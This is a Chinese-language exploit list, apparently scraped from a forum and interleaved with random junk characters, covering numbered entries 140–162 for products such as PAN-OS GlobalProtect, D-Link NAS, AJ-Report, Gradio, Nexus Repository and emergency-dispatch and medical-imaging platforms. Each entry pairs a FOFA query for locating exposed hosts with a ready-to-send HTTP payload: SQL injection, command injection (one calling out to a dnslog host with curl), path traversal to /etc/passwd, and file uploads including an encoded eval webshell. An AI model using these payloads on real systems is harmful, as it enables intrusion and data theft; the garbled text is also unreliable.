8 s B" e( U/ c8 @Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
: M8 D0 b2 N2 H& w8 @8 G hUpgrade-Insecure-Requests: 1
1 U/ v( ~$ t5 M3 w( Y. n/ g" L& _* a
! n( K& Z- L& B; M8 b5 k4 U' t; P# n0 ?% R6 q3 M7 Z: h% ]/ A+ a0 U
140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入2 V1 C w7 U. t( G2 e
CVE-2024-25668 D$ p9 K; e2 f3 a( |7 z, [7 v
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"" q1 M6 _- h1 S2 G4 F, ^7 V! g
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva×tamp=1&sign=1 HTTP/1.10 o1 p% ]6 a6 H# p u. Y
Host: x.x.x.x
; r# a% E7 _5 i" aUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0% w$ m7 @9 }3 K
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+ s& D! h) }1 N3 D! G; i8 G2 GAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.24 C( w: W. X9 K- _
Accept-Encoding: gzip, deflate, br
9 r0 G4 w1 x( k8 G" j$ [Connection: close9 M D. j( N8 C2 u2 g6 v
Cookie: authcode=h8g9
$ ~2 |+ J( T! p7 u, h) ~7 G, HUpgrade-Insecure-Requests: 1
/ D; u) Q; w& R; y4 x K; N4 F. c4 ` j
2 _1 T6 f' N+ N' J% s3 F/ _& H141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入
Z' y- [" v; l" t5 F0 MFOFA:body="指挥调度管理平台"0 w) Y/ u% _% v2 ~% t
POST /app/ext/ajax_users.php HTTP/1.1
( G$ k& l% i( Y7 m6 sHost: your-ip1 r8 ^! E) y1 F$ _% s" ^2 |
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
& \+ O! ]. R9 a0 J: kContent-Type: application/x-www-form-urlencoded5 }! z9 X0 L. S, E& i5 n( g, K
1 K' B K& o+ y" j) K$ \/ U0 }; w/ J
# b# x; i( h# n/ R- y) s3 d" L. q* P2 idep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -
2 K+ \- S' Q$ w
, r; k8 I0 n! x3 [# H6 e7 [; g( W: U; C, z5 ]+ O" D0 D: k
142. CMSV6车辆监控平台系统中存在弱密码6 r! q) y2 b4 l3 N5 `
CVE-2024-29666
4 O1 W7 K+ V- ]# h, [* mFOFA:body="/808gps/"8 j" c# y# V$ D' b
admin/admin2 N' {! J# }. G+ t
143. Netis WF2780 v2.1.40144 远程命令执行& O+ A2 R( f& v$ Y+ P3 Q4 }
CVE-2024-25850
3 F+ S) ^9 P9 {8 H; [7 iFOFA:title='AP setup' && header='netis'! K6 N" _, }; a
PAYLOAD4 y8 ]' Q4 ^" G5 p( _% g
6 I5 b! t, _/ M
144. D-Link nas_sharing.cgi 命令注入
) o4 g5 c% Z; b, u; R/ RFOFA:app="D_Link-DNS-ShareCenter"$ f! V2 R! u+ R) N8 q1 K9 p
system参数用于传要执行的命令
' Y& u0 W4 U: f! J. aGET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.10 f2 R) I1 P! t( B) k- Q- e
Host: x.x.x.x; u6 X9 q4 F7 @ {# j
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0* C0 T1 U* m4 Z& I! V. u0 n
Connection: close: P; ?9 a1 h9 Y+ M8 p
Accept: */*
7 P" [0 [: s: {! V' o, dAccept-Language: en
7 \1 H* z4 H. i- v' ]. p" rAccept-Encoding: gzip
" ~6 T J$ u- u. }4 y+ p9 W! p! t8 u g5 D U
5 c7 F- O& @0 c6 [8 {# h
145. Palo Alto Networks PAN-OS GlobalProtect 命令注入- L1 E1 ]) J8 o% o6 m/ l
CVE-2024-3400. n% |( w% b! [; w& w$ ?3 T
FOFA:icon_hash="-631559155"7 q! u; x$ r/ m4 i& m) O& K# B
GET /global-protect/login.esp HTTP/1.1
2 q2 X* U5 x0 g8 hHost: 192.168.30.112:1005
4 j) X& U/ T) [# m3 ?" A7 \! QUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.848 Q4 u4 }- Z/ a
Connection: close k, n. }0 f+ f8 x' y6 ~+ [' @
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;
) V- m: t) @9 yAccept-Encoding: gzip
+ ~: |) T/ R3 s, {) S( ~
6 G; m; J4 C2 w' e `$ K) {/ h# e6 k* x- n' c" l6 S8 v* q0 Y
146. MajorDoMo thumb.php 未授权远程代码执行
9 d. ?7 Y6 j) v! C1 ACNVD-2024-02175
B7 l% {% |1 O1 x# V, _) |/ uFOFA:app="MajordomoSL"" ^( C+ O/ {) G4 M5 k
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
/ m, M2 Y7 l/ L3 X2 ^! _) \# gHost: x.x.x.x& g+ Y+ e6 C2 ~6 w) U+ u' n6 G
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.840 ]& E5 ` G8 |
Accept-Charset: utf-8( X; V8 [+ x. z7 z( ]: J# l2 y
Accept-Encoding: gzip, deflate+ a7 N0 ?* o) K9 C
Connection: close% {/ B/ ]5 W& c
6 t9 {. x& ~: b. L1 p
& I" p7 L" b& ~' N+ u& D
147. RaidenMAILD邮件服务器v.4.9.4-路径遍历% ~4 r. R& W5 ^) J/ d9 j
CVE-2024-32399
* g! B9 V9 q- I/ _( KFOFA:body="RaidenMAILD"8 Q( S; }. z4 ?6 i' O2 _5 O
GET /webeditor/../../../windows/win.ini HTTP/1.16 X7 }6 T2 R$ e4 j# y5 X6 y
Host: 127.0.0.1:81+ Y, E* o0 s% @ t+ a0 Z" Z# _
Cache-Control: max-age=0( x X0 |) L# B
Connection: close, b5 m( B& N( y2 {6 c$ e% Y6 c0 b* P
, J! K7 m0 z3 N7 `2 _
! O8 `6 E; {6 i
148. CrushFTP 认证绕过模板注入
6 ^ B3 b' v# d9 y2 wCVE-2024-4040
( x' [6 W" g4 F2 J) l# B0 i- fFOFA:body="CrushFTP"
* T, {8 @9 a; ^2 `) I$ Y+ IPAYLOAD
4 j! x# l' T0 k l- P! I
! Z# t& b' ~3 {9 d" q- j5 K. p3 F149. AJ-Report开源数据大屏存在远程命令执行. U) e$ @9 ~7 R' a, R
FOFA:title="AJ-Report"( f& x0 r+ a0 h+ u! v7 ^# n
8 ^) a8 \6 D8 G# _/ dPOST /dataSetParam/verification;swagger-ui/ HTTP/1.1
- ^1 E, g) Y9 x4 }7 wHost: x.x.x.x
# D) ~- P+ F9 B7 q( wUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
9 W; ^0 p7 ^7 m7 qAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
2 M# T* J- `% \4 N( S& r# X9 xAccept-Encoding: gzip, deflate, br0 Q) P2 U5 Y5 f
Accept-Language: zh-CN,zh;q=0.94 Z4 p% f# `* p6 G
Content-Type: application/json;charset=UTF-86 w$ t. Q/ ?7 ~% a1 x) {
Connection: close% b2 z6 c" [2 D+ M5 q
$ N7 i8 U3 U' v) V
{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}
/ c( x. U+ l! T- @5 Q* k% b
4 E; K5 |9 |0 n, Z r. N150. AJ-Report 1.4.0 认证绕过与远程代码执行0 N0 m7 J7 K$ N L. _
FOFA:title="AJ-Report"* D" a+ J$ G. R; R5 W& }6 G' r
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
3 D5 ?6 D9 R v5 NHost: x.x.x.x
5 r' M- r0 t# w3 |0 d/ gUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36- U; ^* z/ @8 ]7 c3 V# {
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7. n9 G+ q! q% |, X/ \ |
Accept-Encoding: gzip, deflate, br" f7 P5 C: [% O9 v) V7 m
Accept-Language: zh-CN,zh;q=0.9
$ v0 a( [# k% i# F" mContent-Type: application/json;charset=UTF-8. v8 N8 O$ D7 M9 M
Connection: close
. {0 a1 ]/ [* z! a" fContent-Length: 339
' f, @% {0 |, q( o$ y1 \6 e" [) U0 z2 c7 t, j( z
{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}# n7 t! l8 r: f7 [3 g: o4 d, }9 f& \
9 }: T; p& ], M$ Z- Y! `% \6 n: m: i# H8 h, F: T" U, ^ ` O0 w( u
151. AJ-Report 1.4.1 pageList sql注入
/ G2 x" n m @! G! ?5 Q% ?FOFA:title="AJ-Report"( q8 Y8 @0 b3 r, s( z
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
0 q: e7 c# s* W$ q# r$ W, i4 { @Host: x.x.x.x4 d/ F+ O% R% L; X# \' l5 z+ B
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
$ S" c) M, X7 |: V6 Q6 S6 R' r TConnection: close
7 \8 B9 b: M9 S$ {5 oAccept-Encoding: gzip5 L% ^( a" j' l& b# M
+ {( g. X! d, y! Q
( O8 }" {# c4 p2 l7 b152. Progress Kemp LoadMaster 远程命令执行+ n0 k3 [) {% G" E8 b. j s
CVE-2024-1212( W7 K8 G2 o( Z& h- e8 _3 U
LoadMaster <= 7.2.59.2 (GA)
7 B/ ~2 s: ?# V" cLoadMaster<=7.2.54.8 (LTSF)1 `$ c7 j8 ?& E( H
LoadMaster <= 7.2.48.10 (LTS)2 ^! L4 s% g& V$ w5 ], M& ^% S
FOFA:body="LoadMaster"
; T. Z* V8 ~% A$ \4 U4 QJztsczsnOmRvZXNub3RtYXR0ZXI=是';ls;':doesnotmatter的base64编码
% `5 D) y9 ~* y" b" t/ q6 ~GET /access/set?param=enableapi&value=1 HTTP/1.14 z6 e4 c D. M: d
Host: x.x.x.x
3 `* ~+ }- o# T6 \% r7 oUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
" H8 i: n# O+ J; I* W2 Y9 uConnection: close
7 m5 q( N- f: T% E3 NAccept: */*9 H7 G% @4 `3 H% w. |
Accept-Language: en$ z: }/ F0 y2 r3 S$ H2 _! g
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=4 ^( @4 N6 Y7 f
Accept-Encoding: gzip
# g/ O/ }1 A; [: M
9 c; o' k" {5 `0 M* v: r. o/ g# n
153. gradio任意文件读取, L" ]8 n" A, u
CVE-2024-1561FOFA:body="__gradio_mode__"
3 W' m2 u. f4 z9 B$ U第一步,请求/config文件获取componets的id2 a2 r! W& I! B |% M: U* ^0 D
http://x.x.x.x/config
% F: R" p H6 K0 O% ^' G# ^& G) H( y
7 o& k. x' A7 M2 t) m
* t. c# G& Q6 `( y" _0 | ?第二步,将/etc/passwd的内容写入到一个临时文件
; O& s# |5 T4 LPOST /component_server HTTP/1.1: F& W+ p4 L( V2 g+ J
Host: x.x.x.x: T' {* R1 |; O
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3
6 \# `4 ?/ T/ S. P& lConnection: close
/ n- T3 a0 `, n/ |9 H' y% h( Q' @4 hContent-Length: 115
1 [9 i/ H% b! }+ n p6 m% ~, hContent-Type: application/json
# V2 g, M* J1 w/ `4 \Accept-Encoding: gzip$ N& c2 [5 U, J& \6 P) I% T
8 }# i6 Y$ B* A H9 Q' o
{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}
) W7 b0 K# t0 _' V; k9 S7 g! a/ U* t& v& E$ @
* v N3 H! D E3 U
第三步访问3 T% S7 a# b8 {, b2 C$ G
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd& c4 ?+ m; F/ l# o. |7 k
! c3 {! H2 u# D1 | b) l. f" E1 ~" N# z+ S$ l6 u' q; m
154. 天维尔消防救援作战调度平台 SQL注入$ U$ S, S9 s0 x' [2 H8 ~
CVE-2024-3720FOFA:body="天维尔信息科技股份有限公司" && title=="登入"* c' C. [% e; f. C; f
POST /twms-service-mfs/mfsNotice/page HTTP/1.1
7 y' ^" W$ Q, o) F" n) pHost: x.x.x.x4 D$ t# c3 Z1 p, l$ w$ Q4 p
Content-Length: 106
5 R+ S1 A" Q" v5 W" N$ F1 ^- LCache-Control: max-age=0/ z0 p/ S8 D: k% |0 |
Upgrade-Insecure-Requests: 1
" R3 b2 Z4 ~( y% q, Q# UOrigin: http://x.x.x.x
J3 g0 M1 h- o WContent-Type: application/json
' x' g' d4 ~: e9 aUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.368 P9 x9 i$ j" r6 d+ |) C+ [5 W1 n
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7* Q' A0 x: k5 W, q
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
5 O# U5 C: x8 @/ F; B5 bAccept-Encoding: gzip, deflate
# |; p$ |' v; w+ kAccept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
! k: h# }! J, _+ Z8 m# a; DConnection: close
C& e6 G: Q, P& N8 s* g* G" [. n5 z1 s3 T. q
{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}1 R$ t b, [0 t' c7 Q
9 [9 T1 l) s, l# h
# d+ Z! d8 W, y0 s! x9 N
155. 六零导航页 file.php 任意文件上传
3 t1 J. ^0 W! lCVE-2024-349824 v# Z( d! c/ s5 U' c0 y; q
FOFA:title=="上网导航 - LyLme Spage"4 V) V/ m+ g5 I# ^2 b7 C! L1 W
POST /include/file.php HTTP/1.1
# S8 {& ^- K# O- H9 U2 iHost: x.x.x.x' A7 _+ G; @9 h6 t" f2 _
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0( Z7 K3 E Z- j9 J. I. J/ U
Connection: close4 s8 l# R% [. k8 {0 \# i' N; H
Content-Length: 2325 @, y5 ^) F/ K/ I/ { z
Accept: application/json, text/javascript, */*; q=0.01* ?7 v: z2 G9 H/ m7 ~
Accept-Encoding: gzip, deflate, br
+ E3 s( k b, tAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.24 K `$ U5 ^2 h. z/ C) w2 P! g
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
0 T: v. X- u0 V. L/ o" G, m/ ZX-Requested-With: XMLHttpRequest% Y% @9 O7 s9 m: m) d' |
; K# p& }% D& t2 E- [-----------------------------qttl7vemrsold314zg0f
/ P5 d2 ^; T& L; a+ SContent-Disposition: form-data; name="file"; filename="test.php": k z. b6 f; S+ x# K1 B" s3 G6 C
Content-Type: image/png% z$ g- n7 C3 [' t9 \8 ^
' n$ c+ i$ K9 l
<?php phpinfo();unlink(__FILE__);?>. G' B: j* j o
-----------------------------qttl7vemrsold314zg0f--
3 c! B1 h; J! s. N0 ^
0 H8 j: B2 w" A- t9 y: t7 ^9 j4 P' p: V2 y( R% f+ M5 s# ^" {* y
访问回显文件http://x.x.x.x/files/upload/img_664ab7fd14d2c.php6 E5 a% t1 y) C9 u ~- ~
5 C0 e% D% {$ Q) b, p156. TBK DVR-4104/DVR-4216 操作系统命令注入' b3 n! O6 `- t3 O+ y. c
CVE-2024-37215 t1 Y! C( O5 X% P1 z
FOFA:"Location: /login.rsp"
' f! ~! r. ~0 \& X/ `·TBK DVR-4104) u& Q& h+ T. G+ r
·TBK DVR-4216
1 R! c0 i0 D' y+ t9 ]curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"+ M( q$ h& q1 I+ p/ O5 \/ o5 B
! H) K8 `! M! W z( G x
/ C9 R. n" V2 J$ u5 f/ `( WPOST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.17 M; p! c$ ]6 a' t) t4 P, C$ w
Host: x.x.x.x" z7 {" `& m+ B, X9 P' Q
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
# Z9 L/ f8 y) T( \. T1 h6 `0 { s1 S+ ~Connection: close# k1 H8 S2 {# o3 [
Content-Length: 0
9 |, U* Y4 t" O" p1 b' h- {% sCookie: uid=1
; U7 M- x7 M6 u s+ }Accept-Encoding: gzip
& n; W: }- ?) Z$ i& p( n. u% J5 o/ _# s4 ~% G9 h1 @
" f, b8 Q0 y6 {1 M/ B% [
157. 美特CRM upload.jsp 任意文件上传
2 w2 U7 T& T% ^- QCNVD-2023-06971+ p( d7 Q$ d; B6 Z A# [9 t1 W* _
FOFA:body="/common/scripts/basic.js"
! ?* v+ C$ z+ I: JPOST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1: a, D( R# F8 a$ O& _
Host: x.x.x.x
, ^9 v: \$ P6 w# \" S8 N2 nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
9 @& M6 Z4 a0 r' B$ aContent-Length: 709. N, I, o0 V; u' n1 n, ?! r n# g" Z
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
- h4 ~! X' v) k! k! qAccept-Encoding: gzip, deflate
& t5 N; t& r7 ^! A h6 MAccept-Language: zh-CN,zh;q=0.9
* s. @4 k1 f) L5 Z3 E- kCache-Control: max-age=0
0 Q# I+ C2 a* [: {Connection: close
- {: b& B& M' {' I. R6 J' OContent-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN" V @. w6 D# ?
Upgrade-Insecure-Requests: 1
/ H3 P8 y- \; [% n# S& i# C
8 ]7 o& R0 @' _# Z& F------WebKitFormBoundary1imovELzPsfzp5dN( t/ E( F4 _5 U0 J
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
9 ]4 c; M6 H2 `% L& v& M, JContent-Type: application/octet-stream
. z# a4 \% e% a: t
' i1 s, W& ?9 x$ q3 z+ s1 Y! Snyhelxrutzwhrsvsrafb
! R; t: H2 r7 k. l------WebKitFormBoundary1imovELzPsfzp5dN& b8 d7 ]5 ^% r' x* x9 x" W
Content-Disposition: form-data; name="key"& Z( B3 R& t$ C9 ?* O5 O* f% D
* j$ Z) e/ `) l# h2 M- dnull- r; N4 s6 w5 s" j' o9 x
------WebKitFormBoundary1imovELzPsfzp5dN( S6 D& m a7 M* M- f# i, C
Content-Disposition: form-data; name="form"& U' ^- f3 e7 P: x' K5 @
- @$ v$ b; G0 E& R' x$ y1 g
null4 J9 Y* R5 W0 f: A% f
------WebKitFormBoundary1imovELzPsfzp5dN
! d$ n. q' f6 ~5 R% O- @& B# r3 s5 u: TContent-Disposition: form-data; name="field"
5 R( m; K- }- q1 \ g' p* @- @7 c( _
null
- D7 M: D' p" I( H3 Z------WebKitFormBoundary1imovELzPsfzp5dN
9 ~( k& b4 n6 g8 c) e0 @Content-Disposition: form-data; name="filetitile"% g2 ]+ F% C! v! k8 L
I. w$ }8 ^- ?8 `4 h4 u
null2 S# d3 o8 v( q ~2 G4 N
------WebKitFormBoundary1imovELzPsfzp5dN
: V" y. o9 F# x( p& jContent-Disposition: form-data; name="filefolder"
0 a1 u2 B! Q) `* \# ~$ A3 D; }3 O- @
null
4 O2 R( M) S3 Q" H P5 T------WebKitFormBoundary1imovELzPsfzp5dN--2 L9 F) n- x- |6 t% {
d. ^! C m1 r+ ~' M# J
4 p) V1 e9 b) c( l ehttp://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp
s d; v8 f: a/ }1 @1 _- R
8 |2 T8 `4 `, T158. Mura-CMS-processAsyncObject存在SQL注入: [/ b* a2 N' }) y
CVE-2024-32640
/ U# x5 H; Y$ Q2 ~7 y. ]4 BFOFA:"Generator: Masa CMS"
$ K* e& O6 {* \0 b9 UPOST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
7 s2 s- i. A1 w# UHost: {{Hostname}}0 B+ } w! a. d' d" v) ^1 X6 r
Content-Type: application/x-www-form-urlencoded! }; H$ d2 D2 D+ z' C* f: i+ q( u J$ [
* Z& V: K2 A0 Iobject=displayregion&contenthistid=x\'&previewid=10 u4 Y! B! Y5 {# y- C; K) k' c
# ~6 V, y3 [) x) ]6 H1 E
9 L% _1 r! |! O, M7 h159. 英飞达医学影像存档与通信系统 WebJobUpload任意文件上传
% e7 W9 G7 o. x$ I, o7 X) gFOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")
) q0 U3 e3 K' m! ~$ oPOST /webservices/WebJobUpload.asmx HTTP/1.1& l& I$ _, B8 j" Q3 t' b
Host: x.x.x.x
! u* _! S0 u2 H' x5 T9 M1 L; u' tUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.367 V- d: V5 y7 s7 I+ K
Content-Length: 1080+ d6 j: v9 e8 P( i8 ]0 ?
Accept-Encoding: gzip, deflate) \& Z0 r; _# o& p6 y
Connection: close
h' u ?( F+ l, V3 lContent-Type: text/xml; charset=utf-8$ ?1 n: s" S6 g2 X: N% U
Soapaction: "http://rainier/jobUpload"
X* f9 Q$ K# z( Y( ?# q: u
7 ` o' u: b: q* S<?xml version="1.0" encoding="utf-8"?>
: r0 K& j3 w, C/ [<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
9 z$ z/ |' G( R% T) E<soap:Body>
5 Z2 z$ L5 X5 I4 w3 H" U, i5 t" _- j0 Z4 L<jobUpload xmlns="http://rainier">* h `- [+ k: a4 S/ ~5 V
<vcode>1</vcode>+ H6 f* S8 x C* g+ m2 A
<subFolder></subFolder>
0 `9 H: X& T) O4 f% N<fileName>abcrce.asmx</fileName>
5 y# c# ? }: ~& b# o<bufValue>PCVAIFdlYlNlcnZpY2UgTGFuZ3VhZ2U9IkpTY3JpcHQiIENsYXNzPSJXZWJTZXJ2aWNlMSIgJT4KIAppbXBvcnQgU3lzdGVtO2ltcG9ydCBTeXN0ZW0uV2ViO2ltcG9ydCBTeXN0ZW0uSU87aW1wb3J0IFN5c3RlbS5XZWIuU2VydmljZXM7CmltcG9ydCBTeXN0ZW0uV2ViLlNjcmlwdC5TZXJ2aWNlczsKaW1wb3J0IFN5c3RlbS5XZWI7CmltcG9ydCBTeXN0ZW0uV2ViLlNlcnZpY2VzOwogCnB1YmxpYyBjbGFzcyBXZWJTZXJ2aWNlMSBlleHRlbmRzIFdlYlNlcnZpY2UKewogCldlYk1ldGhvZEF0dHJpYnV0ZSBTY3JpcHRNZXRob2RBdHRyaWJ1dGUgZnVuY3Rpb24gQ21kc2hlbGwoUGFzcyA6IFN0cmluZykgOiBWb2lkCiAgICB7CiAgICAgICAgICAgIHZhciBjIID0gSHR0cENvbnRleHQuQ3VycmVudDsKICAgICAgICAgICAgdmFyIFJlcXVlc3QgPSBjLlJlcXVlc3Q7CiAgICAgICAgICAgIHZhciBSZXNwb25zZSA9IGMuUmVzcG9uc2U7CiAgICAgICAgICAgIGV2YWwoUGFzcyk7CiAgICCB9Cn0=</bufValue>
9 Z/ x. R$ Z x) B4 k2 `( `% D</jobUpload>
' {1 N0 b9 f6 l2 [. _</soap:Body>
* E( E3 O2 p: l3 H; U: D4 u</soap:Envelope>* T, b5 \! T9 ]6 M% C+ p' ~
% e+ p, O: X5 P: x* j' z& ~# D4 E& _
/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")
" P5 Z, P) U6 M6 ]2 p t4 K- T# ]- q H8 t7 r
- Q2 a, ^' ]3 E7 F160. Sonatype Nexus Repository 3目录遍历与文件读取) F6 s3 `) D5 O3 y G
CVE-2024-4956
6 w" H9 d8 F* c. r' v% X, `FOFA:title="Nexus Repository Manager"% K H9 y/ k k# R$ C
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
8 ^' S& }0 |2 C7 [7 u6 w2 n; DHost: x.x.x.x, s! u* z% o5 \; Z
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
m8 i3 {( u5 [# F; LConnection: close
( c2 q" k0 Y5 ZAccept: */*8 O: f) m, R+ l, U+ r0 T
Accept-Language: en
9 p _% X' {& K& |' xAccept-Encoding: gzip
3 J6 x$ } \- w, O( a8 ]' U
( x( d! n5 n, c+ J7 h- e8 g
. F1 I( H: k, R9 S' q- |161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传- Q) T* C+ V j# `
FOFA:body="/KT_Css/qd_defaul.css"
: ~4 ?; r; u* X, v' {7 i第一步,上传文件<fileName>字段指定文件名,<fileFlow>字段指定文件内容,内容需要base64加密
% \) ^2 j% O4 K! k$ `POST /Webservice.asmx HTTP/1.1$ ?3 h1 O' k$ \& G2 Y
Host: x.x.x.x3 e S' D' ?; L. N: x [
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
$ ~1 w/ ^$ ~# S# b9 }Connection: close
. X/ [/ Y8 @& I, @' L5 O. fContent-Length: 445
; j- W2 W* M+ V9 FContent-Type: text/xml
+ ~ t$ r$ j2 Y! ^Accept-Encoding: gzip5 B; i* k* |% _3 M4 E# d# [
% @) \' X; u! R% ?5 F
<?xml version="1.0" encoding="utf-8"?>
8 y& G4 |3 l( z- H. g" i3 T; K' v8 S7 V<soap:Envelope xmlns:xsi="
9 N$ H& ~; q3 @1 R0 Q" m7 thttp://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema", j. Z" c8 N" H! X
xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">( s: [- g; t4 u
<soap:Body>2 W/ |7 `2 X$ u8 A9 d! X6 T, y
<UploadResume xmlns="http://tempuri.org/">; G, A! H. ]; U, C- V
<ip>1</ip>1 l, [8 q: V# o; i$ f `
<fileName>../../../../dizxdell.aspx</fileName>9 S3 J9 w; @" _5 V6 H
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
5 ^) s' A5 D% W2 y! Z<tag>3</tag>
q I+ T4 p9 t</UploadResume>
. W! w* N% O6 o. o) R7 d</soap:Body>% |: k. Y5 P1 w7 u; S& ~7 P
</soap:Envelope>
9 p- e+ f& ~5 y$ U, \, {; F) M$ Z7 K3 N- j e" N
! g' m- c, O$ h* @- E
http://x.x.x.x/dizxdell.aspx
2 o! @8 ^7 U2 G4 s% ]" o
( J: [" o4 m, U# I& [! M4 y162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传
+ ~, t) D* D$ J Q( }: ?FOFA: app="和丰山海-数字标牌"
